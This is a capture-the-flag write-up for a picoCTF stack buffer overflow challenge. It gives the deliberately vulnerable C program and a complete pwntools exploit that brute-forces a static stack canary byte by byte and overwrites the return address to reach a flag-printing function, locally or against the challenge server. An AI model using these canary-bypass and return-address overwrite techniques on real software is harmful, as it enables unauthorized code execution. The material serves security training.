Buffer Overflow 1

#buffer-overflow

Contents

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>

#define BUFSIZE 64
#define FLAGSIZE 64
#define CANARY_SIZE 4

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    fflush(stdout);
    exit(0);
  }

  fgets(buf,FLAGSIZE,f); // size bound read
  puts(buf);
  fflush(stdout);
}

char global_canary[CANARY_SIZE];
void read_canary() {
  FILE *f = fopen("canary.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'canary.txt' in this directory with your",
                    "own debugging canary.\n");
    fflush(stdout);
    exit(0);
  }

  fread(global_canary,sizeof(char),CANARY_SIZE,f);
  fclose(f);
}

void vuln(){
   char canary[CANARY_SIZE];
   char buf[BUFSIZE];
   char length[BUFSIZE];
   int count;
   int x = 0;
   memcpy(canary,global_canary,CANARY_SIZE);
   printf("How Many Bytes will You Write Into the Buffer?\n> ");
   while (x<BUFSIZE) {
      read(0,length+x,1);
      if (length[x]=='\n') break;
      x++;
   }
   sscanf(length,"%d",&count);

   printf("Input> ");
   read(0,buf,count);

   if (memcmp(canary,global_canary,CANARY_SIZE)) {
      printf("***** Stack Smashing Detected ***** : Canary Value Corrupt!\n"); // crash immediately
      fflush(stdout);
      exit(0);
   }
   printf("Ok... Now Where's the Flag?\n");
   fflush(stdout);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  read_canary();
  vuln();
  return 0;
}

Solution

#!/usr/bin/env python

from pwn import *

if args.REMOTE:
    isRemote = True
else:
    isRemote = False

port = 50091
# r = remote('saturn.picoctf.net', port)

size = 65
index = 0

a = [32,32,32,32]
context.log_level = 'warn'
print("[INFO] Start brute forcing Canary....")
if isRemote:
    print("[INFO] Please be patient, it may take some time")

while True:
    payload = flat(str(size).encode("ascii"), b'\n', b'i' * 64)

    for i in a:
        payload = flat(payload, chr(i).encode("ascii"))

    if isRemote:
        r = remote('saturn.picoctf.net', port)
        r.sendline(payload)
        output = r.recvall()
    else:
        r = process('./vuln')
        r.sendline(payload)
        output = r.recvall()

    if len(output) != 116:
        print("[INFO] Canary " + str(index + 1) + " Done.")
        if index < 3:
            size += 1
            index += 1
        else:
            break
    else:
        a[index] += 1

size = 88
payload = flat(str(size).encode("ascii"), b'\n', b'i' * 64)

for i in a:
    payload = flat(payload, chr(i).encode("ascii"))
payload = flat(payload, b'i' * 16, 0x08049336)

if isRemote:
    r = remote('saturn.picoctf.net', port)
    r.sendline(payload)
    r.recvuntil(b'Flag?')
    output = r.recvall().strip(b'\n')
else:
    r = process('./vuln')
    r.sendline(payload)
    r.recvuntil(b'Flag?')
    output = r.recvall().strip(b'\n')

print()
print(output.decode("ascii"))
print()